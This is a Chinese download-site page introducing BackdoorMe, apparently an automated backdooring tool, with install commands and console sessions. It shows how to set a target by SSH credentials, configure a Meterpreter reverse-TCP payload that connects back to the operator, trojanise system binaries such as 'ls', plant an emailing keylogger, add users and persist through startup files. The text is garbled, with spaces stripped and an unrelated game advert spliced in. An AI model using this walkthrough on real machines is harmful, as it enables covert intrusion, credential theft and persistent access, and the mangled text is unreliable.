强大的自动化后门 用于渗透测试(BackdoorMe)

BackdoorMe是一款功能强大的自动化后门工具，用于渗透测试！很明显，软件是带有攻击性的，严禁用于非法用途。该工具目前使用了metasploit接口，以后会慢慢淡化接口，增强自身特色。需要的朋友下！昆仑墟0.1折版下载-昆仑墟首续0.1折无限充1.0.0 bt版

BackdoorMe怎么用

在安装backdoorme之前，请先确保您准备好了所有的依赖包。

$pythondependencies.py

启动backdoorme：

$pythonmaster.py  ___     __   __       __ ___  /_)________//_____//__ ___ ____/ |/ /__ /_ /_`/__/ '_/_ /_/_/__//|_//-_) /____/\_,_/\__/_/\_\_,_/\___/\___/_//_/ /_/\__/ WelcometoBackdoorMe,apowerfulbackdooringutility.Type"help"toseethelistofavailablecommands. Type"addtarget"tosetatarget,and"open"toopenanSSHconnectiontothattarget. UsinglocalIPof10.1.0.1. >>

加入target：

>>addtarget TargetHostname:10.1.0.2 Username:victim Password:password123 +Target1Set! >>

Backdoor

请输入“use”关键词来使用后门：

>>usemetasploit +Usingcurrenttarget1. +UsingMetasploitbackdoor... (msf)>>

从从这儿开始，你可以设置后门相关选项，运行“showoptions”或者“help”，来查看需要配置的参数。这里设置选项，用“set”就行了。

(msf)>>showoptions Backdooroptions:  Option   Value   Description  Required ------   -----   -----------  -------- name    initd   nameofthebackdoor    False format   elf  formattowritethebackdoorto  True lhost   10.1.0.1    localIPtoconnectbackto  True encoder  none    encodertouseforthebackdoor  False lport   4444    localporttoconnectbackon   True payload  linux/x86/meterpreter/reverse_tcp   payloadtodeployinbackdoor   True (msf)>>setnameapache +name=>apache (msf)>>showoptions Backdooroptions:  Option   Value   Description  Required ------   -----   -----------  -------- name    apache   nameofthebackdoor    False ...

Modules

每个后门在添加了额外的模块后，会变得更加有效。要添加一个模块，只需要使用“add”。

(msf)>>addpoison +Poisonmoduleadded

每个模块都有额外的参数可以定制，如果运行了“help”，你可以看到或者设置任何附加选项。

(msf)>>help ... Poisonmoduleoptions:  Option   Value   Description  Required ------   -----   -----------  -------- name    ls    nameofcommandtopoison  False location/bin   wheretoputpoisonedfilesinto    False

现在能启用的模块包括：

Poison：

感染目标计算机上的可执行文件，它会编译一个exe，把原有的程序变为后门。

比如，如果这个模块感染了“ls”，它会进行编译，然后把正常“ls”给变成后门“ls”，这样一来用户可以更频繁地运行“ls”后门。

Cron：

作用和做法同上。

Web：

启动WEB服务，放置存有后门的WEB页面，访问该网页则监听开始。

Keylogger：

植入键盘记录器，在配置时可以配入点自己邮件，每小时会收到结果。

User：

添加新用户。

Startup：

可以将后门植入bashrc或者init文件。

Auxiliaries

为了更加隐蔽，某些用户可能会希望在目标机器上使用特定的服务。应用auxiliary模块，使用“apply”即可。

>>applyuser +UserAuxiliaryModuleadded.

Auxiliaries支持modules的使用，所有它们能更加隐蔽和频繁的运行。

>>(user)addstartup +StartupModuleadded.

现有启用的auxiliaries包括：

User

在目标机器添加新用户。

Targets

Backdoorme支持同时操作多个目标，使用数字序号切换即可。比如，使用“usemetasploit2”命令，可以在目标“2”上使用msf。

什么是后门程序

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

后门程序又称特洛依木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。

BackdoorMe有哪些功能模块

其内置了Backdoors（后门）、Modules（模块）和Auxiliaries（辅助模块）

Bash

Bash2(依赖更多)

Metasploit

Netcat

Netcat-traditional

Perl

Php(非WEB后门，但使用了WEB模块)

Pupy

Python

Web(php–WEB后门)